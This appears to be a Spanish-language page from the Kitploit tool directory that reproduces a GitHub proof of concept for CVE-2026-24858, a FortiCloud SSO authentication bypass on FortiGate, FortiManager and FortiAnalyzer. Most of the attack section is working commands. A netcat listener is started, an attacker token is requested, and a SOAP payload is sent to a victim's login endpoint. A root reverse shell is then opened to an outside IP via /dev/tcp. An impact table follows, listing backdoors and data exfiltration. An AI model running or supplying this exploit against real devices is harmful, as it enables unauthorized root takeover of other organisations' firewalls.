Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-24858-FortiCloud-SSO-Authentication-Bypass — CVE-2026-24858 FortiCloud Single Sign On (SSO): una función habilitada por defecto de fábrica una vez que registras cualquier FortiGate/FortiManager/FortiAnalyzer contiene una vulnerabilidad crítica de omisión de autenticación. | Kitploit
Herramientas/GitHubGitHub/absholi7ly/cve-2026-24858-forticloud-sso-authentication-bypass
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAutenticaciónRed Teaming
GitHubabsholi7ly/cve-2026-24858-forticloud-sso-authentication-bypass

CVE-2026-24858-FortiCloud-SSO-Authentication-Bypass

CVE-2026-24858 FortiCloud Single Sign On (SSO): una función habilitada por defecto de fábrica una vez que registras cualquier FortiGate/FortiManager/FortiAnalyzer contiene una vulnerabilidad crítica de omisión de autenticación.

Ver Repositorio
956hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-24858 | Bypass de Autenticación SSO de FortiCloud


Resumen Ejecutivo

FortiCloud Single-Sign-On (SSO), una función habilitada por defecto de fábrica una vez que registras cualquier FortiGate/FortiManager/FortiAnalyzer, contiene una vulnerabilidad crítica de bypass de autenticación.

Un atacante que posea cualquier cuenta de FortiCloud (gratuita o de pago) puede reutilizar su token SSO para iniciar sesión en los dispositivos de otros clientes (≤ builds listados abajo) sin conocer sus contraseñas.

La post-explotación otorga acceso completo a la GUI de administración y shell root, permitiendo la interceptación de tráfico, manipulación de VPN o movimiento lateral hacia redes internas.

Actualice inmediatamente o deshabilite FortiCloud SSO hasta que se aplique el parche.


Builds Afectados

ProductoFirmware VulnerableParcheado
FortiOS7.0.0–7.0.18, 7.2.0–7.2.12, 7.4.0–7.4.10, 7.6.0–7.6.5≥ 7.0.19, ≥ 7.2.13, ≥ 7.4.11, ≥ 7.6.6
FortiManager7.0.0–7.0.10, 7.2.0–7.2.5, 7.4.0–7.4.9mismo major.minor+1
FortiAnalyzermismos rangosmismo

PoC

  1. Máquina del atacante
    Listener para reverse shell:

    root@kitploit:~
    nc -lvnp 4444
    
  2. Obtener token del atacante (TTL de 15 min)

    root@kitploit:~
    curl -k -X POST https://customerapiauth.fortinet.com/api/v1/auth/token \
      -H "Content-Type: application/json" \
      -d '{"username":"[email protected]","password":"AttackerPass123"}'
    

    Respuesta (fragmento):

    root@kitploit:~
    {"access_token":"eyJ0eXAiOiJKV1QiLCJhbGc...","expires_in":900}
    

    Copie el valor de access_token.

  3. Construir payload de bypass
    Guarde como bypass.xml:

    root@kitploit:~
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Body>
        <authRequest>
          <serialNumber>FGT80ETK21000000</serialNumber>
          <token>eyJ0eXAiOiJKV1QiLCJhbGc...</token>
          <action>login</action>
        </authRequest>
      </soapenv:Body>
    </soapenv:Envelope>
    
  4. Enviar a la víctima (cualquier firmware ≤ tabla anterior)

    root@kitploit:~
    curl -k -X POST https://<VICTIM-IP>:443/remote/logincheck \
      -H "Content-Type: application/xml" \
      --data @bypass.xml \
      -c cookies.txt
    

    HTTP 200 + Set-Cookie: APSCOOKIE=... → éxito.

  5. Navegar por la GUI de administración
    Abra el navegador o use curl con la cookie guardada:

    root@kitploit:~
    curl -k -b cookies.txt https://<VICTIM-IP>/ng/
    

    → Aparece el Dashboard sin solicitar contraseña.

  6. Shell root (widget CLI)
    Dentro de la GUI: Dashboard → CLI Console

    root@kitploit:~
    execute bash
    bash-4.4# bash -i >& /dev/tcp/192.168.8.129/4444 0>&1
    

    El listener recibe:

    root@kitploit:~
    root@FGT80ETK21000000:/#
    

Impacto

EscenarioResultado
Admin de solo lecturaExportar configuración completa (secretos VPN, políticas local-in, hashes de usuarios).
Admin de escrituraAlterar reglas de firewall, crear usuarios locales, deshabilitar logging, implantar scripts persistentes.
Shell rootVolcar config.dat, extraer claves HA, pivotar a subredes internas, implantar servicio backdoor.
Movimiento lateralEl dispositivo se convierte en punto de apoyo; VLANs y túneles SSL-VPN son confiables → brecha más profunda en la red.
Exfiltración de datosTodo el tráfico pasa a través del FortiGate → proxy transparente + inyección de certificados.
Descargar herramienta